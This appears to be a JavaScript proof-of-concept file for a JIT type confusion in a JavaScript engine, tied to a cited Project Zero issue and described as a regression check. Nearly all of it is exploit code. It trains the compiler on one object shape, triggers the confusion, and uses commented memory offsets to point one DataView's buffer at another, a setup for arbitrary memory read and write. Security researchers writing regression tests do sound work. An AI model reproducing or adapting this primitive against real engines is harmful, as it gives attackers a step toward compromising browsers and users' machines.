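/**
 * Builds an object with ten properties (a..j = 1..10) added one at a time.
 *
 * The properties are assigned individually instead of written as a literal;
 * going by the name, the intent is for the engine to store them in its
 * out-of-line ("aux") slot storage rather than inline slots. That is an
 * engine-internal detail — confirm against the engine build under test.
 *
 * @returns {{a:number,b:number,c:number,d:number,e:number,f:number,g:number,h:number,i:number,j:number}}
 */
function createAuxSlotsObj() {
  const o = {};
  o.a = 1;
  o.b = 2;
  o.c = 3;
  o.d = 4;
  o.e = 5;
  o.f = 6;
  o.g = 7;
  o.h = 8;
  o.i = 9;
  o.j = 10;
  return o;
}

/**
 * Proof-of-concept for the JIT type confusion tracked as Project Zero issue 1702
 * (see the `ref:` comment below). Intended as a regression check against a
 * particular engine build: on an engine that carries the fix, the sequence
 * below should amount to ordinary property writes with no observable effect.
 */
const TypeConfusionPoC = {
  // ref: https://bugs.chromium.org/p/project-zero/issues/detail?id=1702
  /**
   * Runs the PoC sequence.
   *
   * @param {DataView} dataview1 - presumably a DataView; it is stored into a
   *   property of the inline object at the end of the sequence.
   * @param {DataView} dataview2 - presumably a DataView; it is stored into a
   *   property of the aux-slots object at the end of the sequence.
   * @returns {undefined}
   */
  TypeConfusion: (dataview1, dataview2) => {
    // Warm-up target. It writes o.b, constructs an object whose prototype is
    // `proto`, then writes o.a. `tmp` is never read: constructing the object
    // is the side effect the sequence depends on (kept verbatim on purpose —
    // the exact statement shape is what the engine compiles).
    function opt(o, proto, value) {
      o.b = 1;
      let tmp = { __proto__: proto };
      o.a = value;
    }
    const auxSlotsObj = createAuxSlotsObj();
    // Call opt() 2000 times with a fresh { a, b } object each time so the
    // engine JIT-compiles it specialised for that object shape.
    for (let i = 0; i < 2000; i++) {
      let o = { a: 1, b: 2 };
      opt(o, {}, {});
    }
    // Final call departs from the warm-up pattern: the object is passed as its
    // own prototype, and auxSlotsObj is the value written to o.a.
    const inlineObj = { a: 1, b: 2 };
    opt(inlineObj, inlineObj, auxSlotsObj);
    // auxSlotsObj->auxSlots (inlineObj->auxSlots+0x10) = dataview1
    inlineObj.c = dataview1;
    // dataview1->buffer (auxSlotsObj->auxSlots+0x38) = dataview2
    auxSlotsObj.h = dataview2;
  },
};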